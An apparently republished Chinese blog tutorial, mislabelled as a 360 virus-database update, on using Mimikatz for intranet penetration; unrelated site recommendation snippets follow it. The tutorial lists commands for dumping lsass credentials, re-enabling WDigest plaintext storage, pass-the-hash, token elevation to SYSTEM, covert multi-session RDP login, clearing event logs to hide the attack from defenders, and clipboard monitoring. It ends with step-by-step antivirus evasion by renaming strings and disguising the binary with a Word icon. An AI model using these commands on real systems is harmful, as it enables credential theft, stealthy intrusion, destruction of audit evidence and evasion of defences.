360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/323687.html

(0)

相关推荐

  • 漫步者音箱r101t06,漫步者音箱r101t06说明书

    【不满格评测·原创】2008年笔者入手了一台漫步者低音炮,型号是R101T06,当时花了一百多块钱。12年过去了,经历了几次搬家,各种摔摔打打,虽然现在看起来有点旧,但用着还是和当年一个样。应该说,从那时起笔者就已经被漫步者圈粉了,高配低价、稳定耐用,是这个品牌给笔者最深的印象。如今能够这样本本分分做产品的厂商真的不多了。   时隔12年后的今天,…

    2023-06-26 用户投稿
  • 微信群人数上限,微信群人数上限怎么扩容

    《微信群人数上限:探究与解析》 一、微信群人数上限的基本情况 在微信这个广泛使用的社交平台中,微信群的人数上限一直是一个备受关注的话题。 也许很多人都曾好奇过,为什么微信群的人数会有一个限制呢?我觉得这可能与微信的技术架构和运营策略有关。 从技术角度来看,可能是为了确保服务器的性能和稳定性,避免因过多的用户同时在线而导致系统崩溃。 而从运营策略方面考虑,也许…

    2025-06-06
  • 武汉号导弹驱逐舰(武汉号导弹驱逐舰改装)

    在3月17日12点央视播放的视频中,人民海军“湖北籍”舰艇武汉舰、黄石舰、鄂州舰、咸宁舰、宜昌舰、襄阳舰、荆门舰、黄冈舰、孝感舰、荆州舰集体亮相,共同为湖北加油!其实在人民海军中一共有11艘服役的“湖北籍”舰艇,分属4个级别,视频中少了施恩舰。我们来分别看看他们的情况。 首先出场的是武汉号驱逐舰,舷号169,于2004年服役于**舰队,属于052B型驱逐舰,…

    2023-05-25 用户投稿
  • 网页保存密码,网页怎么设置记住账号和密码

    平时我们在使用像QQ浏览器这样的搜索引擎工具来进行内容的搜索时,我们很多时候都需要登录到某一个网站当中,才能够使用更多的功能,比如东西的购买,小知识网页的收藏等等。 而我们为了让日常使用更加的轻松和便利,我们都会将自己登录的账号和密码进行保存,这样一来,下次再登录的时候,直接就可以点击登录了,免去了在此输入账号和密码的繁琐,也避免了忘记密码的尴尬处境,轻轻一…

    2023-06-27
  • 5000笔记本电脑推荐,五款最值得购买的笔记本推荐

    近几年受到疫情的影响,网课、线上会议的需求大大增加,便携的轻薄本成为大家的首选。临近开学,对于步入高校的同学们来说,5000左右价位的轻薄本是个不错的选择,既可以满足上课需求,又可以娱乐休闲。本期将为大家盘点五款最值得购买的笔记本,看看你最适合哪款吧。 一、荣耀MagicBook 14 2022 酷睿独显版 对于轻薄本来说,续航是一个比较重要的点,出门在外或…

    2023-06-04 用户投稿
  • 热血物语ex,热血物语ex2007技能威力

    热血物语地下世界技能学习攻略 不是所有人物都能学习技能,目前已知三个地方,第一个大多数人应该都知道: 第二个: 更新下第三个道馆:终于学会了升龙拳(这里应该是流程中后期了) 有两种方法可以到:一种跳房顶,一种跳河里的浮木过去,两种方法都十分凶险,且路上小怪较多,建议跳房子过去 应该有三个这种道观,我这个人物技能是参考街霸的隆,旋风腿+波动拳+升龙拳, 升龙拳…

    2023-07-04 用户投稿
  • 人口普查短表(人口普查短表由什么住户填报)

    世界排名:1   人口增长率:0.38%   面积:9,634,057平方公里   首都:北京   地区:亚洲   次地区:东亚   人口数量   1,447,301,400   中国人口指标   出生率:10.94/1000   死亡率:7.14/1000   预期寿命(男女):77   男性平均寿命:73.64   女性平均寿命:79.4   生育率:1…

    2023-05-24
  • 汽车美容店加盟(汽车美容加盟连锁品牌)

    随着市场经济发展的多样化,汽车美容加盟连锁作为一种全新的商业模式,正在为越来越多的投资者和创业者所青睐。无可否认,在实际操作过程中,汽车美容加盟连锁行业鱼龙混杂,个别不法商人打着“汽车美容加盟”的幌子,干的却是骗人骗财的勾当。 有关人士指出,汽车美容加盟连锁的商业模式给一些资金有限、缺乏经验的投资者提供了好机会,但稍有不慎,就会中人圈套,“赔了夫人又折兵。”…

    2023-06-18
  • 兔斯基软件,助力软件哪个好

    欢迎来到由小鱼干开讲的《吃鸡新鲜事速报》,相信很多玩家,已经知道了1.8将要上线和兔斯基联动的新军需了吧,本来小鱼干以为,光子应该会在1.7才官宣。 但没想到的是,光子这回比较“猴急”,居然提前了2天,也就是1.5就官宣了兔斯基新军需。不过这回的官宣有点特殊,是通过活动来官宣的! 兔斯基新套装1元购来了,找不到活动入口?请不要着急!   有的玩家不…

    2023-07-03 用户投稿
  • 顾宪成是哪个朝代的,顾宪明历史人物

    明朝末年朝廷昏暗,阉党当道,党争激烈,最为有名的就是阉党与东林党的斗争,那是你死我活的斗争。 天启皇帝朱由校并不想当皇帝,他只想当一个高级的木工,所以他把大权都给了魏忠贤。 被万历皇帝罢职还乡的政治清流顾宪成回到家乡无锡,在宋朝杨时所建东林书院废墟的基础上,重建了东林书院进行讲学、宣传自己的政见。 东林书院 很快在顾宪成的身边聚集了顾允成、高攀龙、安希范、刘…

    2023-07-13 用户投稿
  • 胃炎必吃三种药,治疗胃病哪种药最好

    紧张的工作、不规律的饮食,让很多人深受胃病的折磨。胃病要养,除了保证规律的饮食外,适当的运动也有助于调节胃的健康状况。那么,胃病患者平时应该怎么运动才能养好胃呢? 运动疗胃作为有效的辅助疗法,胃病患者可以参加的运动包括气功、太极拳、步行、慢跑、骑自行车等。同时,胃病的运动疗法要注意全身运动与局部运动相结合,如配合一些适当的按摩治疗,调整胃肠神经功能,减轻自觉…

    2023-07-03 用户投稿
  • nike篮球鞋,买Nike篮球鞋,舒适实用!

    一双篮球鞋,到底有多讲究? 无论你是不是球鞋爱好者,或者是篮球爱好者,可能你都听说过乔丹鞋。然而说到所谓的乔丹鞋呢?你可能会有印象的是满大街的AJ1,或者AJ11?又或者是AJ3?AJ4?AJ6?等等。然而,今天我要和大家深度分享的,可能是整个“历史上最好的一双篮球鞋”。 说一下背景,在AJ的第23代之后的4年,可谓是AJ正代史上,最灰暗,最不愿意提及的时代…

    2023-05-21